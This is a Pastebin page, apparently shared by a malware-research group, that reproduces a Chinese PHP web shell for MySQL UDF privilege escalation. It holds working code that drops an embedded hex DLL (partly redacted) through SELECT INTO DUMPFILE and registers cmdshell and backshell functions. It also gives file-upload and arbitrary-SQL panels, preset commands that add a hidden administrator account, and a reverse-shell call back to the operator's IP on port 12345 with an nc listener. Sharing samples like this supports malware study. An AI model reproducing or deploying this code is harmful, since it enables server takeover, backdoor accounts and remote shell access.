SHARE
TWEET

UDF_PHP PHP/MySQL basis DLL Injection Web Shell

MalwareMustDie Jan 4th, 2016 (edited) 57 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. if (get_magic_quotes_gpc()) {
  3. function stripslashes_deep($value)
  4. {
  5. $value = is_array($value) ?
  6. array_map('stripslashes_deep', $value) :
  7. stripslashes($value);
  8.  
  9. return $value;
  10. }
  11.  
  12. $_POST = array_map('stripslashes_deep', $_POST);
  13. $_GET = array_map('stripslashes_deep', $_GET);
  14. $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
  15. $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
  16. }
  17.  
  18. session_start();
  19. if($_GET['action']=='logout'){
  20. foreach($_COOKIE["connect"] as $key=>$value){
  21. setcookie("connect[$key]","",time()-1);
  22. }
  23. header("Location:".$_SERVER["SCRIPT_NAME"]);
  24. }
  25. if(!empty($_POST['submit'])){
  26. setcookie("connect");
  27. setcookie("connect[host]",$_POST['host']);
  28. setcookie("connect[name]",$_POST['name']);
  29. setcookie("connect[pass]",$_POST['pass']);
  30. setcookie("connect[dbname]",$_POST['dbname']);
  31. echo "<!script>location.href='?action=connect'</script>";
  32. }
  33.  
  34. /*
  35. foreach($_COOKIE["connect"] as $key=>$value){
  36. echo $key.":".$value."<br>";
  37. }
  38. */
  39.  
  40. if(empty($_GET["action"])){
  41. ?>
  42. <form name="form1" method="post" action="?action=connect">
  43.   <div align="center">
  44.     <table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
  45.         <caption>
  46.                     <h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
  47.         </caption>
  48.       <tr>
  49.         <td width="66">host:</td>
  50.         <td width="270"><input name="host" type="text" id="host" size="34"></td>
  51.       </tr>
  52.       <tr>
  53.         <td>name:</td>
  54.         <td><input name="name" type="text" id="name" size="34"></td>
  55.       </tr>
  56.       <tr>
  57.         <td>pass:</td>
  58.         <td><input name="pass" type="text" id="pass" size="34"></td>
  59.       </tr>
  60.       <tr>
  61.         <td>dbname:</td>
  62.         <td><input name="dbname" type="text" id="dbname" size="34"></td>
  63.       </tr>
  64.       <tr>
  65.         <td colspan="2"><div align="center">
  66.           <input type="submit" name="submit" value="提交">
  67.           &nbsp;
  68.           <input type="reset" name="Submit" value="重置">
  69.         </div></td>
  70.       </tr>
  71.     </table>
  72.   </div>
  73. </form>
  74. <div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
  75. Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
  76. <a href="http://www.moonhack.org" target="_blank">版本更新 (version update)</a>
  77. </div>
  78.  
  79.   <?php
  80. exit;
  81. }
  82.  
  83. $link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
  84. if(!$link){
  85. echo "连接失败.".mysql_error()."<!a href='javascr ipt:history.back()'>返回重填 (previous history)</a></script>";
  86. exit;
  87. }else{
  88. echo "连接成功 (connection success)<br>";
  89. $str=mysql_get_server_info();
  90. echo 'MYSQL版本 ( MySqlversion):'.$str."<br>";
  91. echo "<hr>";
  92. if($str[2]>=1){
  93. $sql="SHOW VARIABLES LIKE '%plugin_dir%'";
  94. $row=mysql_query($sql);
  95. $rows=mysql_fetch_row($row);
  96. $pa=str_replace('\\','/',$rows[1]);
  97. $path=$_SESSION['path']=$pa."/moonudf.dll";
  98.  
  99. }else{
  100. $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
  101. }}
  102.  
  103. $conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
  104. if(!$conn){
  105. echo "数据不存在.".mysql_error()."<!a href='javas cript:history.back()'>返回重填</a></script>";
  106. exit;
  107. }else{
  108. echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
  109. }
  110. echo '<a href="?action=logout">点击退出 (mmd: click to exit)</a>';
  111.  
  112. echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
  113. echo  '<table width="297" height="53" border="1">';
  114. echo    '<tr>';
  115. echo      '<td colspan="2">当前路径 (mmd: curret path):';      
  116. echo      "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
  117. echo    '</tr>';
  118. echo    '<tr>';
  119. echo     '<td width="235"><input type="file" name="file"></td>';
  120. echo      '<td width="46"><input type="submit" name="subfile" value="上传文件(upload file)"></td>';
  121. echo    '</tr>';
  122. echo  '</table>';
  123. echo'</form>';
  124. if($_POST['subfile']){
  125. $upfile=$_POST['p'].$_FILES['file']['name'];
  126.  
  127. if(is_uploaded_file($_FILES['file']['tmp_name']))
  128.             {
  129. if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
  130. echo '上传失败(upload failed)';
  131. }else{
  132. echo '上传成功(upload success),路径为(path)'.$upfile;
  133. }}}
  134.  
  135. echo '<hr>';
  136. echo '<form action="?action=dll" method="post"/>';
  137. echo '<table cellpadding="1" cellspacing="2">';
  138. echo '<tr><td>路径目录为 (mmd: dir/path)</td></tr>';
  139. echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
  140. echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
  141. echo '</table>';
  142. echo '</form>';
  143. echo '<hr>';
  144. if($_POST['subudf']){
  145. mysql_query('DROP TABLE Temp_udf');
  146. $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
  147. if(!$query){
  148. echo '创建临时表Temp_udf失败请查看失败内容 (Temp_udf failed to create a temporary table, please see the failure msg)'.mysql_error();
  149. }else{
  150. $shellcode=udfcode();
  151. $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
  152. if(!mysql_query($query)){
  153. echo 'udf插入失败请查看失败内容(udf insertion failed, see error message)'.mysql_error();
  154. }else{
  155. $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
  156. if(!mysql_query($query)){
  157. echo 'udf导出失败请查看失败内容(udf export failed. see error message)'.mysql_error();
  158. }else{
  159. mysql_query('DROP TABLE Temp_udf');
  160. echo '导出成功(export success)';
  161. }
  162. }
  163. }
  164. }
  165.  
  166. echo '<form name="form2" method="post" action="">';
  167. echo  '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
  168. echo    '<tr>';
  169. echo      '<td width="83">文件路径: (file path)</td>';
  170. echo      '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
  171. echo    '</tr>';
  172. echo    '<tr>';
  173. echo      '<td>目标路径: (target path)</td>';
  174. echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
  175. echo    '</tr>';
  176. echo    '<tr>';
  177. echo      '<td colspan="2">';
  178.        
  179. echo        '<div align="right">';
  180. echo          '<input type="submit" name="Submit2" value="Custom Export">';
  181. echo      '</div></td></tr>';
  182. echo '</table>';
  183. echo '</form>';
  184.  
  185. if(!empty($_POST['diy'])){
  186. $diy=str_replace('\\','/',$_POST['diy']);
  187. $diypath=str_replace('\\','/',$_POST['diypath']);
  188. mysql_query('DROP TABLE diy_dll');
  189. $s='create table diy_dll (cmd LONGBLOB)';
  190. if(!mysql_query($s)){
  191. echo '创建diy_dll表失败 (diy_dll creation fails)'.mysql_error();
  192. }else{
  193. $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
  194. if(!mysql_query($s)){
  195. echo "插入自定义文件失败 (custom file injection failed)".mysql_error();
  196. }else{
  197. $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
  198. if(!mysql_query($s)){
  199. echo "导出自定义dll出错 (Export Custom DLL error)".mysql_error();
  200. }else{
  201. mysql_query('DROP TABLE diy_dll');
  202. echo "成功导出自定义dll (Export Custom DLL Success)<br>";
  203. }}}}
  204.  
  205. echo "<hr>";
  206. echo '自带命令 (shell command):<br>';
  207. echo '<form action="" method="post">';
  208. echo '<select name="mysql">';
  209. echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
  210. echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
  211. echo '<option value="select cmdshell(\'net user\')">查看用户 (View user))</option>';
  212. echo '<option value="select cmdshell(\'netstat -an\')">查看端口 (View Port)</option>';
  213. echo '<option value="select name from mysql.func">查看创建函数 (See created function)</option>';
  214. echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
  215. echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数 (Create backconnect)</option>';
  216. echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹(Backconnect exec..)</option>';
  217. echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
  218. echo '</select>';
  219. echo '<input type="submit" value="提交(Submit)" />';
  220. echo '</form>';
  221.  
  222. echo '<form action="?action=sql" method="post">';
  223. echo '自定义SQL语句 (Custom SQL cmd):<br>';
  224. echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
  225. echo '<input type="submit" value="执行" />';
  226. echo '</form>';
  227.  
  228. echo "回显结果 (Echo Results):<br>";
  229. echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
  230. if(!empty($_POST['mysql'])){
  231. echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
  232. $sql=mysql_query($sql) or die(mysql_error());
  233. while($rows=@mysql_fetch_row($sql)){
  234. foreach($rows as $value){
  235. echo $value;
  236. }}}
  237.  
  238. echo '</textarea><br>';
  239. echo '<hr>';
  240. print("
  241. 功能说明 (Functionality Description):<br>
  242. MYSQL=>5.1<br>
  243. 自动获取高版本mysql调用函数路径(测试mysql5.5)(Mysql recent version autocalls paths/tested in v5.5)<br>
  244. MYSQL<=5.0默认为系统目录(defaults to system directory)<br>
  245. 自定义导出dll (Customize DLL export) <br>
  246. 默认udf自带函数(Udf comes with default function)<br>
  247. cmdshell 执行cmd;<br>
  248. downloader 下载者,到网上下载指定文件并保存到指定目录;<br>
  249. open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br>
  250. backshell 反弹Shell;<br>
  251. ProcessView 枚举系统进程;<br>
  252. KillProcess 终止指定进程;<br>
  253. regread 读注册表;<br>
  254. regwrite 写注册表;<br>
  255. shut 关机,注销,重启;<br>
  256. about 说明与帮助函数;<br>
  257. 默认添加管理员账号$darkmoon 密码123456 (Add $darkmoon as default admin acct, pwd:123456)<br>
  258. 默认反弹端口12345(default backconnect port 12345)<br>
  259. 不要随便删除刚创建的函数 重新生效要mysql重启(Do not delete the newly created function revalidation to restart mysql)<br>
  260. 别人的udf 请自行看别人的udf说明(Others udf pls see others' description)<br>
  261. 常用命令(common commands)<br>
  262. create function cmdshell returns string soname 'moonudf.dll'<br>
  263. select cmdshell('命令')<br>
  264. select backshell('你的ip',12345)<br>
  265. nc -l -p 12345
  266. ");
  267. function udfcode(){return "0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c001009000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e557061636b000000b00100001000000000000000000000000000000000000000000000600000e02e727372630000000050010000c00100e6da000000020000000000000000000000000000600000e088010010e89a02101b0000000e000000001000106b970210b7970210ba970210c8970210a3970210fc0f0010de960210e0960210809502101dba0110ed970210ffaf0110d2960210000400007c070000c40b0000b30200006604000090c0011000000000ffffffff0100000001000000010000000100000000000000000000000000000001000
  268. /////////////////////////   REDACTED FOR THE SECURITY PURPOSE //////////////////////////////////////
  269. 5696e69740050726f63657373566965775f696e69740061626f75740061626f75745f6465696e69740061626f75745f696e6974006261636b7368656c6c006261636b7368656c6c5f6465696e6974006261636b7368656c6c5f696e697400636d647368656c6c00636d647368656c6c5f6465696e697400636d647368656c6c5f696e697400646f776e6c6f6164657200646f776e6c6f616465725f6465696e697400646f776e6c6f616465725f696e6974006f70656e33333839006f70656e333338395f6465696e6974006f70656e333338395f696e6974007265677265616400726567726561645f6465696e697400726567726561645f696e69740072656777726974650072656777726974655f6465696e69740072656777726974655f696e6974007368757400736875745f6465696e697400736875745f696e697400";
  270. }
  271. ?>
RAW Paste Data
Top